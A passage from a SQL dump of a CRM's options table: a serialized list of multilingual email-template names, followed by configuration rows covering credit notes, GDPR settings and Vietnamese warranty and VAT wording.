;s:37:\"purchase-quotation-to-contact-spanish\";i:1;s:29:\"debit-note-to-contact-spanish\";i:1;s:37:\"purchase-statement-to-contact-spanish\";i:1;s:35:\"purchase-request-to-contact-italian\";i:1;s:37:\"purchase-quotation-to-contact-italian\";i:1;s:29:\"debit-note-to-contact-italian\";i:1;s:37:\"purchase-statement-to-contact-italian\";i:1;s:34:\"purchase-request-to-contact-slovak\";i:1;s:36:\"purchase-quotation-to-contact-slovak\";i:1;s:28:\"debit-note-to-contact-slovak\";i:1;s:36:\"purchase-statement-to-contact-slovak\";i:1;s:41:\"purchase-request-to-contact-portuguese_br\";i:1;s:43:\"purchase-quotation-to-contact-portuguese_br\";i:1;s:35:\"debit-note-to-contact-portuguese_br\";i:1;s:43:\"purchase-statement-to-contact-portuguese_br\";i:1;s:24:\"purchase-receipt-swedish\";i:1;s:25:\"pre-orders-notify-swedish\";i:1;s:27:\"pre-orders-handover-swedish\";i:1;s:39:\"loyalty-new-account-bonus-point-swedish\";i:1;s:36:\"loyalty-birthday-bonus-point-swedish\";i:1;s:27:\"purchase-receipt-portuguese\";i:1;s:28:\"pre-orders-notify-portuguese\";i:1;s:30:\"pre-orders-handover-portuguese\";i:1;s:42:\"loyalty-new-account-bonus-point-portuguese\";i:1;s:39:\"loyalty-birthday-bonus-point-portuguese\";i:1;s:24:\"purchase-receipt-turkish\";i:1;s:25:\"pre-orders-notify-turkish\";i:1;s:27:\"pre-orders-handover-turkish\";i:1;s:39:\"loyalty-new-account-bonus-point-turkish\";i:1;s:36:\"loyalty-birthday-bonus-point-turkish\";i:1;s:26:\"purchase-receipt-bulgarian\";i:1;s:27:\"pre-orders-notify-bulgarian\";i:1;s:29:\"pre-orders-handover-bulgarian\";i:1;s:41:\"loyalty-new-account-bonus-point-bulgarian\";i:1;s:38:\"loyalty-birthday-bonus-point-bulgarian\";i:1;s:22:\"purchase-receipt-dutch\";i:1;s:23:\"pre-orders-notify-dutch\";i:1;s:25:\"pre-orders-handover-dutch\";i:1;s:37:\"loyalty-new-account-bonus-point-dutch\";i:1;s:34:\"loyalty-birthday-bonus-point-dutch\";i:1;s:24:\"purchase-receipt-russian\";i:1;s:25:\"pre-orders-notify-russian\";i:1;s:27:\"pre-orders-handover-russian\";i:1;s:39:\"loyalty-new-account-bonus-point-russian\";i:1;s:36:\"loyalty-birthday-bonus-point-russian\";i:1;s:22:\"purchase-receipt-greek\";i:1;s:23:\"pre-orders-notify-greek\";i:1;s:25:\"pre-orders-handover-greek\";i:1;s:37:\"loyalty-new-account-bonus-point-greek\";i:1;s:34:\"loyalty-birthday-bonus-point-greek\";i:1;s:24:\"purchase-receipt-catalan\";i:1;s:25:\"pre-orders-notify-catalan\";i:1;s:27:\"pre-orders-handover-catalan\";i:1;s:39:\"loyalty-new-account-bonus-point-catalan\";i:1;s:36:\"loyalty-birthday-bonus-point-catalan\";i:1;s:23:\"purchase-receipt-german\";i:1;s:24:\"pre-orders-notify-german\";i:1;s:26:\"pre-orders-handover-german\";i:1;s:38:\"loyalty-new-account-bonus-point-german\";i:1;s:35:\"loyalty-birthday-bonus-point-german\";i:1;s:24:\"purchase-receipt-chinese\";i:1;s:25:\"pre-orders-notify-chinese\";i:1;s:27:\"pre-orders-handover-chinese\";i:1;s:39:\"loyalty-new-account-bonus-point-chinese\";i:1;s:36:\"loyalty-birthday-bonus-point-chinese\";i:1;s:27:\"purchase-receipt-vietnamese\";i:1;s:28:\"pre-orders-notify-vietnamese\";i:1;s:30:\"pre-orders-handover-vietnamese\";i:1;s:42:\"loyalty-new-account-bonus-point-vietnamese\";i:1;s:39:\"loyalty-birthday-bonus-point-vietnamese\";i:1;s:26:\"purchase-receipt-indonesia\";i:1;s:27:\"pre-orders-notify-indonesia\";i:1;s:29:\"pre-orders-handover-indonesia\";i:1;s:41:\"loyalty-new-account-bonus-point-indonesia\";i:1;s:38:\"loyalty-birthday-bonus-point-indonesia\";i:1;s:23:\"purchase-receipt-french\";i:1;s:24:\"pre-orders-notify-french\";i:1;s:26:\"pre-orders-handover-french\";i:1;s:38:\"loyalty-new-account-bonus-point-french\";i:1;s:35:\"loyalty-birthday-bonus-point-french\";i:1;s:22:\"purchase-receipt-czech\";i:1;s:23:\"pre-orders-notify-czech\";i:1;s:25:\"pre-orders-handover-czech\";i:1;s:37:\"loyalty-new-account-bonus-point-czech\";i:1;s:34:\"loyalty-birthday-bonus-point-czech\";i:1;s:25:\"purchase-receipt-romanian\";i:1;s:26:\"pre-orders-notify-romanian\";i:1;s:28:\"pre-orders-handover-romanian\";i:1;s:40:\"loyalty-new-account-bonus-point-romanian\";i:1;s:37:\"loyalty-birthday-bonus-point-romanian\";i:1;s:23:\"purchase-receipt-polish\";i:1;s:24:\"pre-orders-notify-polish\";i:1;s:26:\"pre-orders-handover-polish\";i:1;s:38:\"loyalty-new-account-bonus-point-polish\";i:1;s:35:\"loyalty-birthday-bonus-point-polish\";i:1;s:26:\"purchase-receipt-ukrainian\";i:1;s:27:\"pre-orders-notify-ukrainian\";i:1;s:29:\"pre-orders-handover-ukrainian\";i:1;s:41:\"loyalty-new-account-bonus-point-ukrainian\";i:1;s:38:\"loyalty-birthday-bonus-point-ukrainian\";i:1;s:24:\"purchase-receipt-persian\";i:1;s:25:\"pre-orders-notify-persian\";i:1;s:27:\"pre-orders-handover-persian\";i:1;s:39:\"loyalty-new-account-bonus-point-persian\";i:1;s:36:\"loyalty-birthday-bonus-point-persian\";i:1;s:25:\"purchase-receipt-japanese\";i:1;s:26:\"pre-orders-notify-japanese\";i:1;s:28:\"pre-orders-handover-japanese\";i:1;s:40:\"loyalty-new-account-bonus-point-japanese\";i:1;s:37:\"loyalty-birthday-bonus-point-japanese\";i:1;s:24:\"purchase-receipt-spanish\";i:1;s:25:\"pre-orders-notify-spanish\";i:1;s:27:\"pre-orders-handover-spanish\";i:1;s:39:\"loyalty-new-account-bonus-point-spanish\";i:1;s:36:\"loyalty-birthday-bonus-point-spanish\";i:1;s:24:\"purchase-receipt-italian\";i:1;s:25:\"pre-orders-notify-italian\";i:1;s:27:\"pre-orders-handover-italian\";i:1;s:39:\"loyalty-new-account-bonus-point-italian\";i:1;s:36:\"loyalty-birthday-bonus-point-italian\";i:1;s:23:\"purchase-receipt-slovak\";i:1;s:24:\"pre-orders-notify-slovak\";i:1;s:26:\"pre-orders-handover-slovak\";i:1;s:38:\"loyalty-new-account-bonus-point-slovak\";i:1;s:35:\"loyalty-birthday-bonus-point-slovak\";i:1;s:30:\"purchase-receipt-portuguese_br\";i:1;s:31:\"pre-orders-notify-portuguese_br\";i:1;s:33:\"pre-orders-handover-portuguese_br\";i:1;s:45:\"loyalty-new-account-bonus-point-portuguese_br\";i:1;s:42:\"loyalty-birthday-bonus-point-portuguese_br\";i:1;s:32:\"reminder-send-to-contact-swedish\";i:1;s:40:\"reminder-service-send-to-contact-swedish\";i:1;s:35:\"reminder-send-to-contact-portuguese\";i:1;s:43:\"reminder-service-send-to-contact-portuguese\";i:1;s:32:\"reminder-send-to-contact-turkish\";i:1;s:40:\"reminder-service-send-to-contact-turkish\";i:1;s:34:\"reminder-send-to-contact-bulgarian\";i:1;s:42:\"reminder-service-send-to-contact-bulgarian\";i:1;s:30:\"reminder-send-to-contact-dutch\";i:1;s:38:\"reminder-service-send-to-contact-dutch\";i:1;s:32:\"reminder-send-to-contact-russian\";i:1;s:40:\"reminder-service-send-to-contact-russian\";i:1;s:30:\"reminder-send-to-contact-greek\";i:1;s:38:\"reminder-service-send-to-contact-greek\";i:1;s:32:\"reminder-send-to-contact-catalan\";i:1;s:40:\"reminder-service-send-to-contact-catalan\";i:1;s:31:\"reminder-send-to-contact-german\";i:1;s:39:\"reminder-service-send-to-contact-german\";i:1;s:32:\"reminder-send-to-contact-chinese\";i:1;s:40:\"reminder-service-send-to-contact-chinese\";i:1;s:35:\"reminder-send-to-contact-vietnamese\";i:1;s:43:\"reminder-service-send-to-contact-vietnamese\";i:1;s:34:\"reminder-send-to-contact-indonesia\";i:1;s:42:\"reminder-service-send-to-contact-indonesia\";i:1;s:31:\"reminder-send-to-contact-french\";i:1;s:39:\"reminder-service-send-to-contact-french\";i:1;s:30:\"reminder-send-to-contact-czech\";i:1;s:38:\"reminder-service-send-to-contact-czech\";i:1;s:33:\"reminder-send-to-contact-romanian\";i:1;s:41:\"reminder-service-send-to-contact-romanian\";i:1;s:31:\"reminder-send-to-contact-polish\";i:1;s:39:\"reminder-service-send-to-contact-polish\";i:1;s:34:\"reminder-send-to-contact-ukrainian\";i:1;s:42:\"reminder-service-send-to-contact-ukrainian\";i:1;s:32:\"reminder-send-to-contact-persian\";i:1;s:40:\"reminder-service-send-to-contact-persian\";i:1;s:33:\"reminder-send-to-contact-japanese\";i:1;s:41:\"reminder-service-send-to-contact-japanese\";i:1;s:32:\"reminder-send-to-contact-spanish\";i:1;s:40:\"reminder-service-send-to-contact-spanish\";i:1;s:32:\"reminder-send-to-contact-italian\";i:1;s:40:\"reminder-service-send-to-contact-italian\";i:1;s:31:\"reminder-send-to-contact-slovak\";i:1;s:39:\"reminder-service-send-to-contact-slovak\";i:1;s:38:\"reminder-send-to-contact-portuguese_br\";i:1;s:46:\"reminder-service-send-to-contact-portuguese_br\";i:1;s:34:\"spreadsheet-share-assigned-swedish\";i:1;s:41:\"spreadsheet-share-assigned-client-swedish\";i:1;s:37:\"spreadsheet-share-assigned-portuguese\";i:1;s:44:\"spreadsheet-share-assigned-client-portuguese\";i:1;s:34:\"spreadsheet-share-assigned-turkish\";i:1;s:41:\"spreadsheet-share-assigned-client-turkish\";i:1;s:36:\"spreadsheet-share-assigned-bulgarian\";i:1;s:43:\"spreadsheet-share-assigned-client-bulgarian\";i:1;s:32:\"spreadsheet-share-assigned-dutch\";i:1;s:39:\"spreadsheet-share-assigned-client-dutch\";i:1;s:34:\"spreadsheet-share-assigned-russian\";i:1;s:41:\"spreadsheet-share-assigned-client-russian\";i:1;s:32:\"spreadsheet-share-assigned-greek\";i:1;s:39:\"spreadsheet-share-assigned-client-greek\";i:1;s:34:\"spreadsheet-share-assigned-catalan\";i:1;s:41:\"spreadsheet-share-assigned-client-catalan\";i:1;s:33:\"spreadsheet-share-assigned-german\";i:1;s:40:\"spreadsheet-share-assigned-client-german\";i:1;s:34:\"spreadsheet-share-assigned-chinese\";i:1;s:41:\"spreadsheet-share-assigned-client-chinese\";i:1;s:37:\"spreadsheet-share-assigned-vietnamese\";i:1;s:44:\"spreadsheet-share-assigned-client-vietnamese\";i:1;s:36:\"spreadsheet-share-assigned-indonesia\";i:1;s:43:\"spreadsheet-share-assigned-client-indonesia\";i:1;s:33:\"spreadsheet-share-assigned-french\";i:1;s:40:\"spreadsheet-share-assigned-client-french\";i:1;s:32:\"spreadsheet-share-assigned-czech\";i:1;s:39:\"spreadsheet-share-assigned-client-czech\";i:1;s:35:\"spreadsheet-share-assigned-romanian\";i:1;s:42:\"spreadsheet-share-assigned-client-romanian\";i:1;s:33:\"spreadsheet-share-assigned-polish\";i:1;s:40:\"spreadsheet-share-assigned-client-polish\";i:1;s:36:\"spreadsheet-share-assigned-ukrainian\";i:1;s:43:\"spreadsheet-share-assigned-client-ukrainian\";i:1;s:34:\"spreadsheet-share-assigned-persian\";i:1;s:41:\"spreadsheet-share-assigned-client-persian\";i:1;s:35:\"spreadsheet-share-assigned-japanese\";i:1;s:42:\"spreadsheet-share-assigned-client-japanese\";i:1;s:34:\"spreadsheet-share-assigned-spanish\";i:1;s:41:\"spreadsheet-share-assigned-client-spanish\";i:1;s:34:\"spreadsheet-share-assigned-italian\";i:1;s:41:\"spreadsheet-share-assigned-client-italian\";i:1;s:33:\"spreadsheet-share-assigned-slovak\";i:1;s:40:\"spreadsheet-share-assigned-client-slovak\";i:1;s:40:\"spreadsheet-share-assigned-portuguese_br\";i:1;s:47:\"spreadsheet-share-assigned-client-portuguese_br\";i:1;s:30:\"contract-sign-reminder-swedish\";i:1;s:33:\"contract-sign-reminder-portuguese\";i:1;s:30:\"contract-sign-reminder-turkish\";i:1;s:32:\"contract-sign-reminder-bulgarian\";i:1;s:28:\"contract-sign-reminder-dutch\";i:1;s:30:\"contract-sign-reminder-russian\";i:1;s:28:\"new-client-created-norwegian\";i:1;s:32:\"invoice-send-to-client-norwegian\";i:1;s:33:\"new-ticket-opened-admin-norwegian\";i:1;s:22:\"ticket-reply-norwegian\";i:1;s:29:\"ticket-autoresponse-norwegian\";i:1;s:34:\"invoice-payment-recorded-norwegian\";i:1;s:32:\"invoice-overdue-notice-norwegian\";i:1;s:30:\"invoice-already-send-norwegian\";i:1;s:34:\"new-ticket-created-staff-norwegian\";i:1;s:33:\"estimate-send-to-client-norwegian\";i:1;s:31:\"ticket-reply-to-admin-norwegian\";i:1;s:31:\"estimate-already-send-norwegian\";i:1;s:29:\"contract-expiration-norwegian\";i:1;s:23:\"task-assigned-norwegian\";i:1;s:32:\"task-added-as-follower-norwegian\";i:1;s:24:\"task-commented-norwegian\";i:1;s:31:\"task-added-attachment-norwegian\";i:1;s:36:\"estimate-declined-to-staff-norwegian\";i:1;s:36:\"estimate-accepted-to-staff-norwegian\";i:1;s:34:\"proposal-client-accepted-norwegian\";i:1;s:35:\"proposal-send-to-customer-norwegian\";i:1;s:34:\"proposal-client-declined-norwegian\";i:1;s:35:\"proposal-client-thank-you-norwegian\";i:1;s:36:\"proposal-comment-to-client-norwegian\";i:1;s:35:\"proposal-comment-to-admin-norwegian\";i:1;s:40:\"estimate-thank-you-to-customer-norwegian\";i:1;s:36:\"task-deadline-notification-norwegian\";i:1;s:23:\"send-contract-norwegian\";i:1;s:43:\"invoice-payment-recorded-to-staff-norwegian\";i:1;s:27:\"auto-close-ticket-norwegian\";i:1;s:49:\"new-project-discussion-created-to-staff-norwegian\";i:1;s:52:\"new-project-discussion-created-to-customer-norwegian\";i:1;s:47:\"new-project-file-uploaded-to-customer-norwegian\";i:1;s:44:\"new-project-file-uploaded-to-staff-norwegian\";i:1;s:52:\"new-project-discussion-comment-to-customer-norwegian\";i:1;s:49:\"new-project-discussion-comment-to-staff-norwegian\";i:1;s:39:\"staff-added-as-project-member-norwegian\";i:1;s:34:\"estimate-expiry-reminder-norwegian\";i:1;s:34:\"proposal-expiry-reminder-norwegian\";i:1;s:27:\"new-staff-created-norwegian\";i:1;s:33:\"contact-forgot-password-norwegian\";i:1;s:34:\"contact-password-reseted-norwegian\";i:1;s:30:\"contact-set-password-norwegian\";i:1;s:31:\"staff-forgot-password-norwegian\";i:1;s:32:\"staff-password-reseted-norwegian\";i:1;s:29:\"assigned-to-project-norwegian\";i:1;s:43:\"task-added-attachment-to-contacts-norwegian\";i:1;s:36:\"task-commented-to-contacts-norwegian\";i:1;s:27:\"new-lead-assigned-norwegian\";i:1;s:26:\"client-statement-norwegian\";i:1;s:34:\"ticket-assigned-to-admin-norwegian\";i:1;s:40:\"new-client-registered-to-admin-norwegian\";i:1;s:40:\"new-web-to-lead-form-submitted-norwegian\";i:1;s:35:\"two-factor-authentication-norwegian\";i:1;s:38:\"project-finished-to-customer-norwegian\";i:1;s:36:\"credit-note-send-to-client-norwegian\";i:1;s:37:\"task-status-change-to-staff-norwegian\";i:1;s:40:\"task-status-change-to-contacts-norwegian\";i:1;s:30:\"reminder-email-staff-norwegian\";i:1;s:36:\"contract-comment-to-client-norwegian\";i:1;s:35:\"contract-comment-to-admin-norwegian\";i:1;s:27:\"send-subscription-norwegian\";i:1;s:37:\"subscription-payment-failed-norwegian\";i:1;s:31:\"subscription-canceled-norwegian\";i:1;s:40:\"subscription-payment-succeeded-norwegian\";i:1;s:38:\"contract-expiration-to-staff-norwegian\";i:1;s:30:\"gdpr-removal-request-norwegian\";i:1;s:35:\"gdpr-removal-request-lead-norwegian\";i:1;s:39:\"client-registration-confirmed-norwegian\";i:1;s:34:\"contract-signed-to-staff-norwegian\";i:1;s:38:\"customer-subscribed-to-staff-norwegian\";i:1;s:36:\"contact-verification-email-norwegian\";i:1;s:53:\"new-customer-profile-file-uploaded-to-staff-norwegian\";i:1;s:37:\"event-notification-to-staff-norwegian\";i:1;s:46:\"subscription-payment-requires-action-norwegian\";i:1;s:28:\"invoice-due-notice-norwegian\";i:1;s:45:\"estimate-request-submitted-to-staff-norwegian\";i:1;s:35:\"estimate-request-assigned-norwegian\";i:1;s:43:\"estimate-request-received-to-user-norwegian\";i:1;s:36:\"inventory-warning-to-staff-norwegian\";i:1;s:35:\"purchase-order-to-contact-norwegian\";i:1;s:44:\"appointment-cron-reminder-to-staff-norwegian\";i:1;s:40:\"appointment-recurring-to-staff-norwegian\";i:1;s:40:\"appointment-cancelled-to-staff-norwegian\";i:1;s:42:\"appointment-cancelled-to-contact-norwegian\";i:1;s:46:\"appointment-cron-reminder-to-contact-norwegian\";i:1;s:43:\"appointment-recurring-to-contacts-norwegian\";i:1;s:39:\"appointment-approved-to-staff-norwegian\";i:1;s:41:\"appointment-approved-to-contact-norwegian\";i:1;s:40:\"appointment-submitted-to-staff-norwegian\";i:1;s:36:\"callback-assigned-to-staff-norwegian\";i:1;s:40:\"newcallback-requested-to-staff-norwegian\";i:1;s:48:\"appointly-appointment-request-feedback-norwegian\";i:1;s:49:\"appointly-appointment-feedback-received-norwegian\";i:1;s:48:\"appointly-appointment-feedback-updated-norwegian\";i:1;s:30:\"send-request-approve-norwegian\";i:1;s:23:\"send_rejected-norwegian\";i:1;s:22:\"send_approve-norwegian\";i:1;s:35:\"non-billed-tasks-reminder-norwegian\";i:1;s:33:\"invoices-batch-payments-norwegian\";i:1;s:37:\"purchase-request-to-contact-norwegian\";i:1;s:39:\"purchase-quotation-to-contact-norwegian\";i:1;s:31:\"debit-note-to-contact-norwegian\";i:1;s:39:\"purchase-statement-to-contact-norwegian\";i:1;s:26:\"purchase-receipt-norwegian\";i:1;s:27:\"pre-orders-notify-norwegian\";i:1;s:29:\"pre-orders-handover-norwegian\";i:1;s:41:\"loyalty-new-account-bonus-point-norwegian\";i:1;s:38:\"loyalty-birthday-bonus-point-norwegian\";i:1;s:34:\"reminder-send-to-contact-norwegian\";i:1;s:42:\"reminder-service-send-to-contact-norwegian\";i:1;s:36:\"spreadsheet-share-assigned-norwegian\";i:1;s:43:\"spreadsheet-share-assigned-client-norwegian\";i:1;s:32:\"contract-sign-reminder-norwegian\";i:1;s:28:\"contract-sign-reminder-greek\";i:1;s:30:\"contract-sign-reminder-catalan\";i:1;s:29:\"contract-sign-reminder-german\";i:1;s:30:\"contract-sign-reminder-chinese\";i:1;s:33:\"contract-sign-reminder-vietnamese\";i:1;s:32:\"contract-sign-reminder-indonesia\";i:1;s:29:\"contract-sign-reminder-french\";i:1;s:28:\"contract-sign-reminder-czech\";i:1;s:31:\"contract-sign-reminder-romanian\";i:1;s:29:\"contract-sign-reminder-polish\";i:1;s:32:\"contract-sign-reminder-ukrainian\";i:1;s:30:\"contract-sign-reminder-persian\";i:1;s:31:\"contract-sign-reminder-japanese\";i:1;s:30:\"contract-sign-reminder-spanish\";i:1;s:26:\"new-client-created-finnish\";i:1;s:30:\"invoice-send-to-client-finnish\";i:1;s:31:\"new-ticket-opened-admin-finnish\";i:1;s:20:\"ticket-reply-finnish\";i:1;s:27:\"ticket-autoresponse-finnish\";i:1;s:32:\"invoice-payment-recorded-finnish\";i:1;s:30:\"invoice-overdue-notice-finnish\";i:1;s:28:\"invoice-already-send-finnish\";i:1;s:32:\"new-ticket-created-staff-finnish\";i:1;s:31:\"estimate-send-to-client-finnish\";i:1;s:29:\"ticket-reply-to-admin-finnish\";i:1;s:29:\"estimate-already-send-finnish\";i:1;s:27:\"contract-expiration-finnish\";i:1;s:21:\"task-assigned-finnish\";i:1;s:30:\"task-added-as-follower-finnish\";i:1;s:22:\"task-commented-finnish\";i:1;s:29:\"task-added-attachment-finnish\";i:1;s:34:\"estimate-declined-to-staff-finnish\";i:1;s:34:\"estimate-accepted-to-staff-finnish\";i:1;s:32:\"proposal-client-accepted-finnish\";i:1;s:33:\"proposal-send-to-customer-finnish\";i:1;s:32:\"proposal-client-declined-finnish\";i:1;s:33:\"proposal-client-thank-you-finnish\";i:1;s:34:\"proposal-comment-to-client-finnish\";i:1;s:33:\"proposal-comment-to-admin-finnish\";i:1;s:38:\"estimate-thank-you-to-customer-finnish\";i:1;s:34:\"task-deadline-notification-finnish\";i:1;s:21:\"send-contract-finnish\";i:1;s:41:\"invoice-payment-recorded-to-staff-finnish\";i:1;s:25:\"auto-close-ticket-finnish\";i:1;s:47:\"new-project-discussion-created-to-staff-finnish\";i:1;s:50:\"new-project-discussion-created-to-customer-finnish\";i:1;s:45:\"new-project-file-uploaded-to-customer-finnish\";i:1;s:42:\"new-project-file-uploaded-to-staff-finnish\";i:1;s:50:\"new-project-discussion-comment-to-customer-finnish\";i:1;s:47:\"new-project-discussion-comment-to-staff-finnish\";i:1;s:37:\"staff-added-as-project-member-finnish\";i:1;s:32:\"estimate-expiry-reminder-finnish\";i:1;s:32:\"proposal-expiry-reminder-finnish\";i:1;s:25:\"new-staff-created-finnish\";i:1;s:31:\"contact-forgot-password-finnish\";i:1;s:32:\"contact-password-reseted-finnish\";i:1;s:28:\"contact-set-password-finnish\";i:1;s:29:\"staff-forgot-password-finnish\";i:1;s:30:\"staff-password-reseted-finnish\";i:1;s:27:\"assigned-to-project-finnish\";i:1;s:41:\"task-added-attachment-to-contacts-finnish\";i:1;s:34:\"task-commented-to-contacts-finnish\";i:1;s:25:\"new-lead-assigned-finnish\";i:1;s:24:\"client-statement-finnish\";i:1;s:32:\"ticket-assigned-to-admin-finnish\";i:1;s:38:\"new-client-registered-to-admin-finnish\";i:1;s:38:\"new-web-to-lead-form-submitted-finnish\";i:1;s:33:\"two-factor-authentication-finnish\";i:1;s:36:\"project-finished-to-customer-finnish\";i:1;s:34:\"credit-note-send-to-client-finnish\";i:1;s:35:\"task-status-change-to-staff-finnish\";i:1;s:38:\"task-status-change-to-contacts-finnish\";i:1;s:28:\"reminder-email-staff-finnish\";i:1;s:34:\"contract-comment-to-client-finnish\";i:1;s:33:\"contract-comment-to-admin-finnish\";i:1;s:25:\"send-subscription-finnish\";i:1;s:35:\"subscription-payment-failed-finnish\";i:1;s:29:\"subscription-canceled-finnish\";i:1;s:38:\"subscription-payment-succeeded-finnish\";i:1;s:36:\"contract-expiration-to-staff-finnish\";i:1;s:28:\"gdpr-removal-request-finnish\";i:1;s:33:\"gdpr-removal-request-lead-finnish\";i:1;s:37:\"client-registration-confirmed-finnish\";i:1;s:32:\"contract-signed-to-staff-finnish\";i:1;s:36:\"customer-subscribed-to-staff-finnish\";i:1;s:34:\"contact-verification-email-finnish\";i:1;s:51:\"new-customer-profile-file-uploaded-to-staff-finnish\";i:1;s:35:\"event-notification-to-staff-finnish\";i:1;s:44:\"subscription-payment-requires-action-finnish\";i:1;s:26:\"invoice-due-notice-finnish\";i:1;s:43:\"estimate-request-submitted-to-staff-finnish\";i:1;s:33:\"estimate-request-assigned-finnish\";i:1;s:41:\"estimate-request-received-to-user-finnish\";i:1;s:34:\"inventory-warning-to-staff-finnish\";i:1;s:33:\"purchase-order-to-contact-finnish\";i:1;s:42:\"appointment-cron-reminder-to-staff-finnish\";i:1;s:38:\"appointment-recurring-to-staff-finnish\";i:1;s:38:\"appointment-cancelled-to-staff-finnish\";i:1;s:40:\"appointment-cancelled-to-contact-finnish\";i:1;s:44:\"appointment-cron-reminder-to-contact-finnish\";i:1;s:41:\"appointment-recurring-to-contacts-finnish\";i:1;s:37:\"appointment-approved-to-staff-finnish\";i:1;s:39:\"appointment-approved-to-contact-finnish\";i:1;s:38:\"appointment-submitted-to-staff-finnish\";i:1;s:34:\"callback-assigned-to-staff-finnish\";i:1;s:38:\"newcallback-requested-to-staff-finnish\";i:1;s:46:\"appointly-appointment-request-feedback-finnish\";i:1;s:47:\"appointly-appointment-feedback-received-finnish\";i:1;s:46:\"appointly-appointment-feedback-updated-finnish\";i:1;s:28:\"send-request-approve-finnish\";i:1;s:21:\"send_rejected-finnish\";i:1;s:20:\"send_approve-finnish\";i:1;s:33:\"non-billed-tasks-reminder-finnish\";i:1;s:31:\"invoices-batch-payments-finnish\";i:1;s:35:\"purchase-request-to-contact-finnish\";i:1;s:37:\"purchase-quotation-to-contact-finnish\";i:1;s:29:\"debit-note-to-contact-finnish\";i:1;s:37:\"purchase-statement-to-contact-finnish\";i:1;s:24:\"purchase-receipt-finnish\";i:1;s:25:\"pre-orders-notify-finnish\";i:1;s:27:\"pre-orders-handover-finnish\";i:1;s:39:\"loyalty-new-account-bonus-point-finnish\";i:1;s:36:\"loyalty-birthday-bonus-point-finnish\";i:1;s:32:\"reminder-send-to-contact-finnish\";i:1;s:40:\"reminder-service-send-to-contact-finnish\";i:1;s:34:\"spreadsheet-share-assigned-finnish\";i:1;s:41:\"spreadsheet-share-assigned-client-finnish\";i:1;s:30:\"contract-sign-reminder-finnish\";i:1;s:30:\"contract-sign-reminder-italian\";i:1;s:29:\"contract-sign-reminder-slovak\";i:1;s:36:\"contract-sign-reminder-portuguese_br\";i:1;}', 0);
INSERT INTO `tbloptions` (`id`, `name`, `value`, `autoload`) VALUES
(212, 'proposal_accept_identity_confirmation', '1', 0),
(213, 'estimate_accept_identity_confirmation', '1', 0),
(214, 'new_task_auto_follower_current_member', '1', 1),
(215, 'task_biillable_checked_on_creation', '1', 1),
(216, 'predefined_clientnote_credit_note', 'Hóa đơn VAT sẽ xuất theo ngày và báo trước khi xuất hàng đi giao.\r\nGiá bán lẻ không bao gồm thuê GTGT 10% (Theo quy định tại Nghị định 15/2022/NĐ-CP thì nhóm sản phẩm thiết bị điện tử gia dụng có mức thuế suất giá trị gia tăng 10%)', 1),
(217, 'predefined_terms_credit_note', '- Thời gian bảo hành hoạt động motor: 05 năm; phụ kiện (đèn LED, điều khiển...)các bề mặt hoàn thiện sơn khác bảo hành 01 năm.\r\n- Các bảo hành khác như thay PIN điều khiển miễn phí trong 06 tháng \r\n- Bảo bảo hành sự cố rung rắc, tiếng động sau khi nghiệm thu trong 01 tháng sau khi lắp đặt. Còn lại sau đó tính phí 150k/lần', 1),
(218, 'next_credit_note_number', '11', 1),
(219, 'credit_note_prefix', 'CN-', 1),
(220, 'credit_note_number_decrement_on_delete', '1', 1),
(221, 'pdf_format_credit_note', 'LETTER-PORTRAIT', 1),
(222, 'show_pdf_signature_credit_note', '0', 0),
(223, 'show_credit_note_reminders_on_calendar', '1', 1),
(224, 'show_amount_due_on_invoice', '1', 1),
(225, 'show_total_paid_on_invoice', '1', 1),
(226, 'show_credits_applied_on_invoice', '1', 1),
(227, 'staff_members_create_inline_lead_status', '1', 1),
(228, 'staff_members_create_inline_customer_groups', '1', 1),
(229, 'staff_members_create_inline_ticket_services', '1', 1),
(230, 'staff_members_save_tickets_predefined_replies', '1', 1),
(231, 'staff_members_create_inline_contract_types', '1', 1),
(232, 'staff_members_create_inline_expense_categories', '1', 1),
(233, 'show_project_on_credit_note', '1', 1),
(234, 'proposals_auto_operations_hour', '7', 1),
(235, 'estimates_auto_operations_hour', '1', 1),
(236, 'contracts_auto_operations_hour', '21', 1),
(237, 'credit_note_number_format', '2', 1),
(238, 'allow_non_admin_members_to_import_leads', '1', 1),
(239, 'e_sign_legal_text', 'Bằng cách nhấp vào \"Ký tên\", tôi đồng ý bị ràng buộc về mặt pháp lý bởi bản trình bày chữ ký điện tử này của tôi.', 1),
(240, 'show_pdf_signature_contract', '1', 1),
(241, 'view_contract_only_logged_in', '0', 1),
(242, 'show_subscriptions_in_customers_area', '1', 1),
(243, 'calendar_only_assigned_tasks', '1', 1),
(244, 'after_subscription_payment_captured', 'send_invoice_and_receipt', 1),
(245, 'mail_engine', 'phpmailer', 1),
(246, 'gdpr_enable_terms_and_conditions', '0', 1),
(247, 'privacy_policy', '', 1),
(248, 'terms_and_conditions', '', 1),
(249, 'gdpr_enable_terms_and_conditions_lead_form', '0', 1),
(250, 'gdpr_enable_terms_and_conditions_ticket_form', '0', 1),
(251, 'gdpr_contact_enable_right_to_be_forgotten', '0', 1),
(252, 'show_gdpr_in_customers_menu', '1', 1),
(253, 'show_gdpr_link_in_footer', '1', 1),
(254, 'enable_gdpr', '0', 1),
(255, 'gdpr_on_forgotten_remove_invoices_credit_notes', '0', 1),
(256, 'gdpr_on_forgotten_remove_estimates', '0', 1),
(257, 'gdpr_enable_consent_for_contacts', '0', 1),
(258, 'gdpr_consent_public_page_top_block', '', 1),
(259, 'gdpr_page_top_information_block', '', 1),
(260, 'gdpr_enable_lead_public_form', '0', 1),
(261, 'gdpr_show_lead_custom_fields_on_public_form', '0', 1),
(262, 'gdpr_lead_attachments_on_public_form', '0', 1),
(263, 'gdpr_enable_consent_for_leads', '0', 1),
(264, 'gdpr_lead_enable_right_to_be_forgotten', '0', 1),
(265, 'allow_staff_view_invoices_assigned', '1', 1),
(266, 'gdpr_data_portability_leads', '0', 1),
(267, 'gdpr_lead_data_portability_allowed', '', 1),
(268, 'gdpr_contact_data_portability_allowed', '', 1),
(269, 'gdpr_data_portability_contacts', '0', 1),
(270, 'allow_staff_view_estimates_assigned', '1', 1),
(271, 'gdpr_after_lead_converted_delete', '0', 1),
(272, 'gdpr_show_terms_and_conditions_in_footer', '0', 1),
(273, 'save_last_order_for_tables', '1', 1),
(274, 'company_logo_dark', '4b0971bb066b6b2a0e8b1e9afb86eb62.png', 1),
(275, 'customers_register_require_confirmation', '0', 1),
(276, 'allow_non_admin_staff_to_delete_ticket_attachments', '0', 1),
(277, 'receive_notification_on_new_ticket_replies', '0', 0),
(278, 'google_client_id', '918186905588-kab59uamhctqrdjtqn7r2nvas81revin.apps.googleusercontent.com', 1),
(279, 'enable_google_picker', '1', 1),
